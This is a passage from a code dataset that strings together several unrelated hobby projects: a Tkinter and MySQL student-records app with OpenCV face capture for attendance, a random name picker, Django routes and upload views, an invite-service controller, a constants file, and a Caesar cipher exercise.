dept_combo.grid(row=0,column=1,padx=2,pady=10)\r\n dept_combo[\"values\"]=(\"Select Department\",\"Computer\",\"Chemical\",\"IT\",\"Civil\",\"Mechanical\")\r\n dept_combo.current(0)\r\n\r\n #Course\r\n Course_label=tk.Label(Course_frame,text=\"Course:\",font=(\"times new roman\",12,\"bold\"),bg=\"white\")\r\n Course_label.grid(row=0,column=2,padx=10)\r\n\r\n Course_combo=ttk.Combobox(Course_frame,textvariable=self.var_course,font=('times new roman',12,\"bold\"),width=17,state=\"readonly\")\r\n Course_combo.grid(row=0,column=3,padx=2,pady=10)\r\n Course_combo[\"values\"]=(\"Select Course\",\"BE\",\"MSc\",\"Phd\",\"MTech\")\r\n Course_combo.current(0)\r\n\r\n #Year\r\n year_label=tk.Label(Course_frame,text=\"Year:\",font=(\"times new roman\",12,\"bold\"),bg=\"white\")\r\n year_label.grid(row=1,column=0,padx=10)\r\n\r\n year_combo=ttk.Combobox(Course_frame,textvariable=self.var_year,font=('times new roman',12,\"bold\"),width=17,state=\"readonly\")\r\n year_combo.grid(row=1,column=1,padx=2,pady=10)\r\n year_combo[\"values\"]=(\"Select Year\",\"2020-2021\",\"2021-22\",\"2022-23\",\"2023-24\")\r\n year_combo.current(0)\r\n\r\n #Semester\r\n semester_label=tk.Label(Course_frame,text=\"Semester:\",font=(\"times new roman\",12,\"bold\"),bg=\"white\")\r\n semester_label.grid(row=1,column=2,padx=10)\r\n\r\n semester_combo=ttk.Combobox(Course_frame,textvariable=self.var_semester,font=('times new roman',12,\"bold\"),width=17,state=\"readonly\")\r\n semester_combo.grid(row=1,column=3,padx=2,pady=10)\r\n semester_combo[\"values\"]=(\"Select Semester\",\"Ist Semester\",\"2nd Semester\",\"3rd Semester\",\"4th Semester\")\r\n semester_combo.current(0)\r\n\r\n #Class Student Information\r\n Student_frame=tk.LabelFrame(Left_frame,bd=2,bg=\"white\",relief='ridge',text=\"Class Student Information\",font=('Calibri',12))\r\n Student_frame.place(x=5,y=145,width=650,height=320)\r\n\r\n #Student ID\r\n StudentID_label=tk.Label(Student_frame,text=\"Student ID:\",font=(\"times new roman\",12,\"bold\"),bg=\"white\")\r\n StudentID_label.grid(row=0,column=0,padx=5,pady=2)\r\n\r\n StudentID_entry=ttk.Entry(Student_frame,textvariable=self.var_std_id,width=20,font=(\"times new roman\",13,\"bold\"))\r\n StudentID_entry.grid(row=0,column=1,padx=5)\r\n\r\n #Student Name\r\n StudentName_label=tk.Label(Student_frame,text=\"Student Name:\",font=(\"times new roman\",12,\"bold\"),bg=\"white\")\r\n StudentName_label.grid(row=0,column=2,padx=5,pady=5)\r\n\r\n StudentName_entry=ttk.Entry(Student_frame,textvariable=self.var_std_name,width=20,font=(\"times new roman\",13,\"bold\"))\r\n StudentName_entry.grid(row=0,column=3,padx=5,pady=5)\r\n\r\n #class Division\r\n classdiv_label=tk.Label(Student_frame,text=\"Class Division:\",font=(\"times new roman\",12,\"bold\"),bg=\"white\")\r\n classdiv_label.grid(row=1,column=0,padx=10,pady=10)\r\n\r\n # classdiv_entry=ttk.Entry(Student_frame,textvariable=self.var_div,width=20,font=(\"times new roman\",13,\"bold\"))\r\n # classdiv_entry.grid(row=1,column=1,padx=5,pady=5)\r\n\r\n classdiv_combo=ttk.Combobox(Student_frame,textvariable=self.var_div,font=('times new roman',12,\"bold\"),width=17,state=\"readonly\")\r\n classdiv_combo.grid(row=1,column=1,padx=2,pady=10)\r\n classdiv_combo[\"values\"]=(\"A\",\"B\",\"C\")\r\n classdiv_combo.current(0)\r\n\r\n #Roll No\r\n Roll_label=tk.Label(Student_frame,text=\"Roll no:\",font=(\"times new roman\",12,\"bold\"),bg=\"white\")\r\n Roll_label.grid(row=1,column=2,padx=5,pady=5)\r\n\r\n 
Roll_entry=ttk.Entry(Student_frame,textvariable=self.var_roll,width=20,font=(\"times new roman\",13,\"bold\"))\r\n Roll_entry.grid(row=1,column=3,padx=5,pady=5)\r\n\r\n #Gender\r\n Gender_label=tk.Label(Student_frame,text=\"Gender:\",font=(\"times new roman\",12,\"bold\"),bg=\"white\")\r\n Gender_label.grid(row=2,column=0,padx=5,pady=5)\r\n \r\n # Gender_entry=ttk.Entry(Student_frame,textvariable=self.var_gender,width=20,font=(\"times new roman\",13,\"bold\"))\r\n # Gender_entry.grid(row=2,column=1,padx=5,pady=5)\r\n \r\n Gender_combo=ttk.Combobox(Student_frame,textvariable=self.var_gender,font=('times new roman',12,\"bold\"),width=17,state=\"readonly\")\r\n Gender_combo.grid(row=2,column=1,padx=2,pady=10)\r\n Gender_combo[\"values\"]=(\"Male\",\"Female\",\"Other\")\r\n Gender_combo.current(0)\r\n\r\n\r\n #dob\r\n dob_label=tk.Label(Student_frame,text=\"DOB:\",font=(\"times new roman\",12,\"bold\"),bg=\"white\")\r\n dob_label.grid(row=2,column=2,padx=5,pady=5)\r\n \r\n dob_entry=ttk.Entry(Student_frame,textvariable=self.var_dob,width=20,font=(\"times new roman\",13,\"bold\"))\r\n dob_entry.grid(row=2,column=3,padx=5,pady=5)\r\n\r\n #Email\r\n email_label=tk.Label(Student_frame,text=\"Email:\",font=(\"times new roman\",12,\"bold\"),bg=\"white\")\r\n email_label.grid(row=3,column=0,padx=5,pady=5)\r\n \r\n email_entry=ttk.Entry(Student_frame,textvariable=self.var_email,width=20,font=(\"times new roman\",13,\"bold\"))\r\n email_entry.grid(row=3,column=1,padx=5,pady=5)\r\n\r\n #Phone No.\r\n Phone_label=tk.Label(Student_frame,text=\"Phone:\",font=(\"times new roman\",12,\"bold\"),bg=\"white\")\r\n Phone_label.grid(row=3,column=2,padx=5,pady=5)\r\n \r\n phone_entry=ttk.Entry(Student_frame,textvariable=self.var_phone,width=20,font=(\"times new roman\",13,\"bold\"))\r\n phone_entry.grid(row=3,column=3,padx=5,pady=5)\r\n\r\n #Address\r\n address_label=tk.Label(Student_frame,text=\"Address:\",font=(\"times new roman\",12,\"bold\"),bg=\"white\")\r\n address_label.grid(row=4,column=0,padx=5,pady=5)\r\n\r\n address_entry=ttk.Entry(Student_frame,textvariable=self.var_address,width=20,font=(\"times new roman\",13,\"bold\"))\r\n address_entry.grid(row=4,column=1,padx=5)\r\n\r\n #Teacher Name\r\n Teacher_label=tk.Label(Student_frame,text=\"Teacher Name:\",font=(\"times new roman\",12,\"bold\"),bg=\"white\")\r\n Teacher_label.grid(row=4,column=2,padx=5,pady=5)\r\n\r\n Teacher_entry=ttk.Entry(Student_frame,textvariable=self.var_teacher,width=20,font=(\"times new roman\",13,\"bold\"))\r\n Teacher_entry.grid(row=4,column=3,padx=5)\r\n\r\n #Radio Buttons\r\n self.var_radio1=StringVar()\r\n radiobt1=ttk.Radiobutton(Student_frame,variable=self.var_radio1,text=\"Take Photo Sample\",value=\"Yes\")\r\n radiobt1.grid(row=5,column=0)\r\n \r\n\r\n \r\n radiobt1=ttk.Radiobutton(Student_frame,variable=self.var_radio1,text=\"No Photo Sample\",value=\"No\")\r\n radiobt1.grid(row=5,column=1)\r\n\r\n btn_frame=tk.Frame(Student_frame,bd=2,relief='ridge',bg=\"white\")\r\n btn_frame.place(x=0,y=230,width=715,height=36)\r\n \r\n #buttons\r\n save_btn=tk.Button(btn_frame,text=\"Save\",command=self.add_data, width=19, font=('Calibri',12,\"bold\"), bg=\"blue\",fg=\"white\")\r\n save_btn.grid(row=0,column=0)\r\n\r\n update_btn=tk.Button(btn_frame,text=\"Update\",command=self.update_data, width=19, font=('Calibri',12,\"bold\"), bg=\"blue\",fg=\"white\")\r\n update_btn.grid(row=0,column=1)\r\n\r\n delete_btn=tk.Button(btn_frame,text=\"Delete\", command=self.delete_data, width=19, font=('Calibri',12,\"bold\"), 
bg=\"blue\",fg=\"white\")\r\n delete_btn.grid(row=0,column=2)\r\n \r\n reset_btn=tk.Button(btn_frame,text=\"Reset\", command=self.reset_data, width=19, font=('Calibri',12,\"bold\"), bg=\"blue\",fg=\"white\")\r\n reset_btn.grid(row=0,column=3)\r\n\r\n btn_frame1=tk.Frame(Student_frame,bd=2,relief='ridge',bg=\"white\")\r\n btn_frame1.place(x=0,y=266,width=715,height=30)\r\n\r\n take_photo=tk.Button(btn_frame1,text=\"Take Photo Sample\", command=self.generate_dataset, width=80, font=('Calibri',12,\"bold\"), bg=\"blue\",fg=\"white\")\r\n take_photo.grid(row=0,column=0)\r\n\r\n \r\n\r\n #=============table frame==================\r\n\r\n table_frame=tk.Frame(Right_frame,bd=2,bg=\"white\",relief='ridge')\r\n table_frame.place(x=5,y=100,width=650,height=300)\r\n\r\n scroll_x=ttk.Scrollbar(table_frame,orient=\"horizontal\")\r\n scroll_y=ttk.Scrollbar(table_frame,orient=\"vertical\")\r\n\r\n self.table=ttk.Treeview(table_frame,column=(\"dep\",\"course\",\"year\",\"sem\",\"id\",\"name\",\"div\",\"roll\",\"gender\",\"dob\",\"email\",\"phone\",\"address\",\"teacher\",\"photo\"),xscrollcommand=scroll_x.set,yscrollcommand=scroll_y.set)\r\n\r\n scroll_x.pack(side=\"bottom\",fill=\"x\")\r\n scroll_y.pack(side=\"right\",fill=\"y\")\r\n scroll_x.config(command=self.table.xview)\r\n scroll_y.config(command=self.table.yview)\r\n\r\n self.table.heading(\"dep\",text=\"Department\")\r\n self.table.heading(\"course\",text=\"Course\")\r\n self.table.heading(\"year\",text=\"Year\")\r\n self.table.heading(\"sem\",text=\"Semester\")\r\n self.table.heading(\"id\",text=\"StudentID\")\r\n self.table.heading(\"name\",text=\"Name\")\r\n self.table.heading(\"div\",text=\"Division\")\r\n self.table.heading(\"roll\",text=\"Roll No\")\r\n self.table.heading(\"gender\",text=\"Gender\")\r\n self.table.heading(\"dob\",text=\"DOB\")\r\n self.table.heading(\"email\",text=\"Email\")\r\n self.table.heading(\"phone\",text=\"Phone\")\r\n self.table.heading(\"address\",text=\"Address\")\r\n self.table.heading(\"teacher\",text=\"Teacher\")\r\n self.table.heading(\"photo\",text=\"PhotoSampleStatus\")\r\n self.table[\"show\"]=\"headings\"\r\n\r\n self.table.column(\"dep\",width=100)\r\n self.table.column(\"course\",width=100)\r\n self.table.column(\"year\",width=100)\r\n self.table.column(\"sem\",width=100)\r\n self.table.column(\"id\",width=100)\r\n self.table.column(\"name\",width=100)\r\n self.table.column(\"div\",width=100)\r\n self.table.column(\"roll\",width=100)\r\n self.table.column(\"gender\",width=100)\r\n self.table.column(\"dob\",width=100)\r\n self.table.column(\"email\",width=100)\r\n self.table.column(\"phone\",width=100)\r\n self.table.column(\"address\",width=100)\r\n self.table.column(\"teacher\",width=100)\r\n self.table.column(\"photo\",width=100)\r\n \r\n self.table.pack(fill='both',expand=1)\r\n self.table.bind(\"\",self.get_cursor)\r\n self.fetch()\r\n\r\n \r\n def add_data(self):\r\n if self.var_dep.get()==\"Select Department\" or self.var_std_name.get()==\"\" or self.var_std_id.get()==\"\":\r\n messagebox.showerror(\"Error\",\"All Fields are required\",parent=self.root)\r\n else:\r\n try:\r\n conn=mysql.connector.connect(host=\"localhost\",username=\"guptayash\",password=\"Ash_12345\",database=\"face_manag\")\r\n my_cursor=conn.cursor()\r\n my_cursor.execute(\"insert into students 
values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\",(self.var_dep.get(),self.var_course.get(),self.var_year.get(),self.var_semester.get(),self.var_std_id.get(),self.var_std_name.get(),self.var_div.get(),self.var_roll.get(),self.var_gender.get(),self.var_dob.get(),self.var_email.get(),self.var_phone.get(),self.var_address.get(),self.var_teacher.get(),self.var_radio1.get()))\r\n                conn.commit()\r\n                self.fetch()\r\n                conn.close()\r\n                messagebox.showinfo(\"Success\",\"Student details has been added successfully\",parent=self.root)\r\n            except Exception as es:\r\n                messagebox.showerror(\"Error\",f\"Due to :{str(es)}\",parent=self.root)\r\n\r\n    #========fetch_data============\r\n    def fetch(self):\r\n        conn=mysql.connector.connect(host=\"localhost\",username=\"guptayash\",password=\"Ash_12345\",database=\"face_manag\")\r\n        my_cursor=conn.cursor()\r\n        my_cursor.execute(\"select * from students\")\r\n        data=my_cursor.fetchall()\r\n        \r\n        if(len(data)!=0):\r\n            self.table.delete(*self.table.get_children())\r\n            for i in data:\r\n                self.table.insert(\"\",\"end\",values=i)\r\n            conn.commit()\r\n            conn.close()\r\n\r\n\r\n    #============get cursor=================\r\n    def get_cursor(self,event=\"\"):\r\n        cursor_focus=self.table.focus()\r\n        content=self.table.item(cursor_focus)\r\n        data=content[\"values\"]\r\n\r\n        self.var_dep.set(data[0]),\r\n        self.var_course.set(data[1]),\r\n        self.var_year.set(data[2]),\r\n        self.var_semester.set(data[3]),\r\n        self.var_std_id.set(data[4]),\r\n        self.var_std_name.set(data[5]),\r\n        self.var_div.set(data[6]),\r\n        self.var_roll.set(data[7]),\r\n        self.var_gender.set(data[8]),\r\n        self.var_dob.set(data[9]),\r\n        self.var_email.set(data[10]),\r\n        self.var_phone.set(data[11]),\r\n        self.var_address.set(data[12]),\r\n        self.var_teacher.set(data[13]),\r\n        self.var_radio1.set(data[14])\r\n        \r\n#==========update fnc=================\r\n\r\n    def update_data(self):\r\n        if self.var_dep.get()==\"Select Department\" or self.var_std_name.get()==\"\" or self.var_std_id.get()==\"\":\r\n            messagebox.showerror(\"Error\",\"All Fields are required\",parent=self.root)\r\n        else:\r\n            try:\r\n                Update=messagebox.askyesno(\"Update\",\"Do you want to update this student details\",parent=self.root)\r\n                if Update>0:\r\n                    conn=mysql.connector.connect(host=\"localhost\",username=\"guptayash\",password=\"Ash_12345\",database=\"face_manag\")\r\n                    my_cursor=conn.cursor()\r\n                    my_cursor.execute(\"update students set Dep=%s,course=%s,year=%s,Semester=%s,Name=%s,Division=%s,roll=%s,gender=%s,dob=%s,email=%s,phone=%s,address=%s,Teacher=%s,PhotoSample=%s where Student_id=%s\",((self.var_dep.get(),self.var_course.get(),self.var_year.get(),self.var_semester.get(),self.var_std_name.get(),self.var_div.get(),self.var_roll.get(),self.var_gender.get(),self.var_dob.get(),self.var_email.get(),self.var_phone.get(),self.var_address.get(),self.var_teacher.get(),self.var_radio1.get(),self.var_std_id.get())))\r\n\r\n\r\n                else:\r\n                    if not Update:\r\n                        return \r\n                conn.commit()\r\n                self.fetch()\r\n                conn.close()\r\n                messagebox.showinfo(\"Success\",\"Student details successfully updated\",parent=self.root)\r\n            except Exception as es:\r\n                messagebox.showerror(\"Error\",f\"Due To:{str(es)}\",parent=self.root)\r\n    \r\n    #===========delete fnc=============\r\n    def delete_data(self):\r\n        if self.var_std_id.get()==\"\":\r\n            messagebox.showerror(\"Error\",\"Student id is required\",parent=self.root)\r\n        else:\r\n            try:\r\n                delete=messagebox.askyesno(\"Delete Student info\",\"Do you want to delete this student info\",parent=self.root)\r\n                if delete>0:\r\n                    
conn=mysql.connector.connect(host=\"localhost\",username=\"guptayash\",password=\"Ash_12345\",database=\"face_manag\")\r\n                    my_cursor=conn.cursor()\r\n                    sql=\"delete from students where Student_id=%s\"\r\n                    val=(self.var_std_id.get(),)\r\n                    my_cursor.execute(sql,val)\r\n                else:\r\n                    if not delete:\r\n                        return\r\n                conn.commit()\r\n                self.fetch()\r\n                conn.close()\r\n                messagebox.showinfo(\"Delete\",\"Successfully deleted student details\",parent=self.root)\r\n            except Exception as es:\r\n                messagebox.showerror(\"Error\",f\"Due To:{str(es)}\",parent=self.root)\r\n\r\n    #==========reset data=================\r\n    def reset_data(self):\r\n        self.var_dep.set(\"Select Department\")\r\n        self.var_course.set(\"Select Course\")\r\n        self.var_year.set(\"Select Year\")\r\n        self.var_semester.set(\"Select Semester\")\r\n        self.var_std_id.set(\"\")\r\n        self.var_std_name.set(\"\")\r\n        self.var_div.set(\"Select Division\")\r\n        self.var_roll.set(\"\")\r\n        self.var_gender.set(\"Male\")\r\n        self.var_dob.set(\"\")\r\n        self.var_email.set(\"\")\r\n        self.var_phone.set(\"\")\r\n        self.var_address.set(\"\")\r\n        self.var_teacher.set(\"\")\r\n        self.var_radio1.set(\"\")\r\n\r\n\r\n    #****************Generate data set******************\r\n    def generate_dataset(self):\r\n        if self.var_dep.get()==\"Select Department\" or self.var_std_name.get()==\"\" or self.var_std_id.get()==\"\":\r\n            messagebox.showerror(\"Error\",\"All Fields are required\",parent=self.root)\r\n        else:\r\n            try:\r\n                conn=mysql.connector.connect(host=\"localhost\",username=\"guptayash\",password=\"Ash_12345\",database=\"face_manag\")\r\n                my_cursor=conn.cursor()\r\n                my_cursor.execute(\"select * from students\")\r\n                myresult=my_cursor.fetchall()\r\n                id=0\r\n                for x in myresult:\r\n                    id+=1\r\n                my_cursor.execute(\"update students set Dep=%s,course=%s,year=%s,Semester=%s,Name=%s,Division=%s,roll=%s,gender=%s,dob=%s,email=%s,phone=%s,address=%s,Teacher=%s,PhotoSample=%s where Student_id=%s\",((self.var_dep.get(),self.var_course.get(),self.var_year.get(),self.var_semester.get(),self.var_std_name.get(),self.var_div.get(),self.var_roll.get(),self.var_gender.get(),self.var_dob.get(),self.var_email.get(),self.var_phone.get(),self.var_address.get(),self.var_teacher.get(),self.var_radio1.get(),self.var_std_id.get())))\r\n                conn.commit()\r\n                self.fetch()\r\n                self.reset_data()\r\n                conn.close()\r\n\r\n\r\n                #*******************Load data on face frontals from opencv****************\r\n                face_classifier=cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\r\n\r\n                def face_cropped(img):\r\n                    gray=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\r\n                    faces=face_classifier.detectMultiScale(gray,1.3,5)\r\n                    \r\n                    #Generating rectangle for faces\r\n                    for(x,y,w,h) in faces:\r\n                        face_cropped=img[y:y+h,x:x+w]\r\n                        return face_cropped\r\n                    \r\n                cap=cv2.VideoCapture(0)\r\n                img_id=0\r\n                #Capturing Photos\r\n                while True:\r\n                    r,frame1=cap.read()\r\n                    if face_cropped(frame1) is not None:\r\n                        img_id+=1\r\n                        face=cv2.resize(face_cropped(frame1),(450,450))\r\n                        face=cv2.cvtColor(face,cv2.COLOR_BGR2GRAY)\r\n                        file_name_path=\"data/user.\"+str(id)+\".\"+str(img_id)+\".jpg\"\r\n                        cv2.imwrite(file_name_path,face)\r\n                        cv2.putText(face,str(img_id),(50,50),cv2.FONT_HERSHEY_SIMPLEX,1.5,(0,255,0),2)\r\n                        cv2.imshow(\"Cropped Face\",face)\r\n                        \r\n                    if cv2.waitKey(1)==13 or int(img_id)==100:\r\n                        break\r\n                    \r\n                cap.release()\r\n                cv2.destroyAllWindows()\r\n                messagebox.showinfo(\"Result\",\"Data Set Generated\")\r\n\r\n            except Exception as es:\r\n                messagebox.showerror(\"Error\",f\"Due 
To:{str(es)}\",parent=self.root)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n def run(self):\r\n self.root.mainloop()\r\n \r\n\r\n \r\n\r\n\r\n\r\nif __name__==\"__main__\":\r\n root=tk.Tk()\r\n app=Student(root)\r\n app.run()\r\n","repo_name":"yashg170/Face-Recognition-Attendance-System","sub_path":"studentdet.py","file_name":"studentdet.py","file_ext":"py","file_size_in_byte":22551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"7710472305","text":"# Desafio fazer um programa que leia um lista de nomes e escolha um nome aleatoriamente\nfrom random import choice\nnom1 = input('Primeiro auluno')\nnom2 = input('segundo aluno')\nnom3 = input('Terceiro aluno')\nnom4 = input('quarto aluno')\n# lista = []\nescolido = choice([nom1, nom2, nom3, nom4])\nprint(escolido)\n\n\n\n","repo_name":"VitorARG/exercicios-python","sub_path":"PythonExecicios/ex019.py","file_name":"ex019.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"16571439793","text":"\nfrom django.urls import path\nfrom .views import deleteTodo, detailTodo, home, liste,createTodo, updateTodo\n\nurlpatterns = [\n path('', home, name='home'),\n path('liste/', liste, name='liste'),\n path('create/', createTodo, name='create'),\n path('update/', updateTodo, name='update'),\n path('detail/', detailTodo, name='detail'),\n path('delete/', deleteTodo, name='delete'),\n\n]","repo_name":"mehmetakkoc/todo_django","sub_path":"todo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"23151559197","text":"FB_APP_ID = \"\"\nFB_REDIRECT_URI = \"\"\nFB_APP_SECRET = \"\"\n\nFB_OAUTH_DIALOG_URL = \"https://www.facebook.com/dialog/oauth?\"\nFB_ACCESS_TOKEN_URL = \"https://graph.facebook.com/oauth/access_token?\"\nFB_CURRENT_USER_URL = \"https://graph.facebook.com/me?\"\nFB_FEED_URL = \"https://graph.facebook.com/feed\"\n\nLASTFM_API_KEY = \"\"\n\nLASTFM_TOP_TRACKS_URL = \"http://ws.audioscrobbler.com/2.0/?\"\n\nNIKE_PLUS_USER_ID_URL = \"www.nikegadgets.com\"\nNIKE_PLUS_USER_ID_PATH = \"/socialsite/profileRedirect/\"\nNIKE_PLUS_URL = \"http://nikerunning.nike.com/nikeplus/v1/services/app/run_list.jsp?\"\n\nDATABASE_NAME = \"/home/ec2-user/shamer.db\"\nCRONTAB_FILE = \"/home/ec2-user/shamer-crontab\"\nCRONJOB_COMMAND = \"python /home/ec2-user/Public-Shamer/cronjobs.py\"\n","repo_name":"wsong/Public-Shamer","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"1803197290","text":"from core.decorators import request\nfrom core.errors import ExceptionWithStatusCode\nfrom core.responses import SuccessResponse\nfrom service.invite_service import InviteService\n\nclass InviteController:\n \"\"\"\n InviteController controller.\n\n This controller handles all requests to the /user/:userId/invites endpoint.\n\n Attributes that can be found in request object:\n params - The :userId parameter\n query_params - The query parameters (if any)\n ctx - The context object\n headers - The HTTP headers from the request\n body - The body of the request (if any)\n \"\"\"\n \n @request\n def get_specific_invite(self, request):\n response = InviteService.get_invite_by_id(\n request.params.get('inviteId', '')\n )\n return SuccessResponse(response), 
200\n\n @request\n def get_disable_specific_invite(self, request):\n response = InviteService.disable_invite_code(\n request.params.get('inviteId', '')\n )\n return SuccessResponse(response), 200\n\n @request\n def get_all_invites_for_user(self, request):\n show_active = request.query_params.get('active', 'true').lower() == 'true'\n response = InviteService.get_all_invites(\n request.headers.get('X-User', None),\n show_active\n )\n return SuccessResponse(response), 200\n\n @request\n def post_new_invite(self, request):\n response = InviteService.create_invite_code(request.headers.get('X-User', None), request.body)\n return SuccessResponse(response), 201\n\n @request\n def put_update_invite(self, request):\n response = InviteService.update_invite(request.headers.get('X-User', None), request.params.get('inviteId', None), request.body)\n return SuccessResponse(response), 200\n \n @request\n def delete_invite(self, request):\n InviteService.delete_invite(request.headers.get('X-User', None), request.params.get('inviteId', None))\n return None, 204","repo_name":"zaBogdan/CloudComputing","sub_path":"users-service/src/controllers/invite_controller.py","file_name":"invite_controller.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"41881480386","text":"def caesar_encrypt_caps():\n #encryption for caps using caesar cipher\n msg = input(\"Enter the message to encrypt:\\t\")\n shift = input(\"Enter the encryption key:\\t\")\n\n if shift !=\"\":\n shift = int(shift)\n\n shift_encrypt_method(shift, msg)\n\n else:\n shift = 3\n shift_encrypt_method(shift, msg)\n\n\ndef caesar_decrypt_caps():\n #encryption for caps using caesar cipher\n msg = input(\"Enter the message to decrypt:\\t\")\n shift = input(\"Enter the encryption key:\\t\")\n\n if shift !=\"\":\n shift = int(shift)\n\n shift_decrypt_method(shift, msg)\n\n else:\n shift = 3\n shift_decrypt_method(shift, msg)\n\n\ndef shift_encrypt_method(shift,msg):\n encrypted_msg = \"\"\n for c in msg:\n #check if character is an uppercase letter\n if c.isupper():\n # find the position in 0-25\n c_index = ord(c) - ord(\"A\")\n #perform the shift\n new_index = (c_index + shift) % 26\n #convert character\n new_unicode = new_index + ord(\"A\")\n new_char = chr(new_unicode)\n\n #append to encrypted string\n encrypted_msg = encrypted_msg + new_char\n else:\n #leave as it is\n encrypted_msg += c\n\n print(\"Orginial message:\\t\", msg)\n print(\"Encrypted message:\\t\", encrypted_msg)\n\n\ndef shift_decrypt_method(shift,msg):\n decrypted_msg = \"\"\n\n for c in msg:\n\n # check if character is an uppercase letter\n if c.isupper():\n # find the position in 0-25\n c_index = ord(c) - ord(\"A\")\n # perform the negative shift\n new_index = (c_index - shift) % 26\n # convert to new character\n new_unicode = new_index + ord(\"A\")\n new_char = chr(new_unicode)\n # append to plain string\n decrypted_msg = decrypted_msg + new_char\n else:\n #leave it as it is\n decrypted_msg += c\n\n print(\"Encrypted message:\\t\", msg)\n print(\"Decrypted message:\\t\", decrypted_msg)\n\ndef caesar_encrypt():\n shift = 3 # defining the shift count\n text = \"HELLO WORLD\"\n encryption = \"\"\n for c in text:\n # check if character is an uppercase letter\n if c.isupper():\n # find the position in 0-25\n c_unicode = ord(c)\n c_index = ord(c) - ord(\"A\")\n # perform the shift\n new_index = (c_index + shift) % 26\n # convert to new character\n new_unicode = new_index + ord(\"A\")\n\n 
new_character = chr(new_unicode)\n\n # append to encrypted string\n encryption = encryption + new_character\n\n else:\n\n # since character is not uppercase, leave it as it is\n encryption += c\n \n print(\"Plain text:\",text)\n\n print(\"Encrypted text:\",encryption)\n\n\ndef caesar_decrypt():\n shift = 3 # defining the shift count\n encrypted_text = \"KHOOR ZRUOG\"\n plain_text = \"\"\n\n for c in encrypted_text:\n\n # check if character is an uppercase letter\n if c.isupper():\n\n # find the position in 0-25\n c_unicode = ord(c)\n\n c_index = ord(c) - ord(\"A\")\n\n # perform the negative shift\n new_index = (c_index - shift) % 26\n\n # convert to new character\n new_unicode = new_index + ord(\"A\")\n\n new_character = chr(new_unicode)\n\n # append to plain string\n plain_text = plain_text + new_character\n\n else:\n\n # since character is not uppercase, leave it as it is\n plain_text += c\n\n print(\"Encrypted text:\",encrypted_text)\n\n print(\"Decrypted text:\",plain_text)\n\ncaesar_decrypt_caps()\n#caesar_encrypt_caps()\n","repo_name":"briannaBrie/Cryptography","sub_path":"caesar_cipher.py","file_name":"caesar_cipher.py","file_ext":"py","file_size_in_byte":3761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"4505275387","text":"from django.shortcuts import render, redirect\nfrom django.shortcuts import render_to_response \nfrom django.conf import settings\nfrom django.core.files.storage import FileSystemStorage\n\nfrom importationfichier.models import Document\nfrom backoffice.models import *\nfrom accueil_login.views import home\nfrom django.contrib.auth.models import User, Group\n\nfrom .forms import *\nimport os, os.path, string \nfrom os.path import basename\nimport csv\n\ndef rechercheListe(liste,elt):\n\tfor x in liste:\n\t\tif x == elt:\n\t\t\treturn(True)\n\treturn(False)\n\n\ndef nouveau_document(request):\n\tlist_user_group = []\n\tuser = User.objects.filter(groups__name='Gestionnaire_de_donnees')\n\tfor tmp in user:\n\t\tlist_user_group.append(tmp.id)\n\n\tif request.user.is_authenticated :\n\t\tif rechercheListe(list_user_group,request.user.id) or request.user.is_staff :\n\t\t\tform = UploadFileForm(request.POST or None, request.FILES)\n\t\t\treturn render(request, 'importationfichier/home.html', {\n\t\t\t\t'form': form\n\t\t\t\t})\n\t\treturn redirect(home)\n\telse :\n\t\treturn redirect(home)\n\n\ndef upload(request):\n\tlist_user_group = []\n\tuser = User.objects.filter(groups__name='Gestionnaire_de_donnees')\n\tfor tmp in user:\n\t\tlist_user_group.append(tmp.id)\n\tif request.user.is_authenticated :\n\t\tif rechercheListe(list_user_group,request.user.id) or request.user.is_staff:\n\t\t\tform = UploadFileForm(request.POST or None, request.FILES)\n\t\t\trequest.session['sauvegarde'] = False\n\t\t\tdocument = Document()\n\t\t\tif form.is_valid():\n\t\t\t\tdocument.description = form.cleaned_data[\"title\"]\n\t\t\t\tdocument.file = form.cleaned_data[\"file\"]\n\t\t\t\tdocument.importer = False\n\t\t\t\t#if os.path.splitext(str)[1] == '.txt':\n\t\t\t\tif document.file :\n\t\t\t\t\tdocument.save()\n\t\t\t\t\trequest.session['sauvegarde'] = True\n\t\t\telse :\n\t\t\t\tdocument.file = None\n\t\t\treturn render(request, 'importationfichier/upload.html', { 'name_file': document.file })\n\t\treturn redirect(home)\n\telse :\n\t\treturn redirect(home)\n\ndef import_bdd(request):\n\ti = 0 # accumulateur\n\tdocs = Document.objects.all()\n\trequest.session['nbr_fichier_bdd'] = 
False\n\trequest.session['nbr_fichier_serveur'] = False\n\tlist_user_group = []\n\tuser = User.objects.filter(groups__name='Gestionnaire_de_donnees')\n\tfor tmp in user:\n\t\tlist_user_group.append(tmp.id)\n\tif request.user.is_authenticated :\n\t\tif rechercheListe(list_user_group,request.user.id) or request.user.is_staff:\n\t\t\twhile i < len(docs) :\n\t\t\t\tif docs[i].importer :\n\t\t\t\t\trequest.session['nbr_fichier_bdd'] = True\n\t\t\t\t\tprint(i)\n\t\t\t\telse :\n\t\t\t\t\trequest.session['nbr_fichier_serveur'] = True\n\t\t\t\ti = i + 1\n\t\t\tprint(i)\n\t\t\tprint(request.session['nbr_fichier_serveur'])\n\t\t\tprint(request.session['nbr_fichier_bdd'])\n\t\t\treturn render(request, 'importationfichier/importbdd.html',{ 'document' : docs})\n\t\treturn redirect(home)\n\telse :\n\t\treturn redirect(home)\n\n\ndef upload_bdd(request,id_file):\n\timport os\n\tdocs = Document.objects.get(pk=id_file)\n\trequest.session['importation_bdd'] = False\n\trequest.session['nbr_ligne_erreur_bdd'] = False\n\tfile_name = \"media/\" + 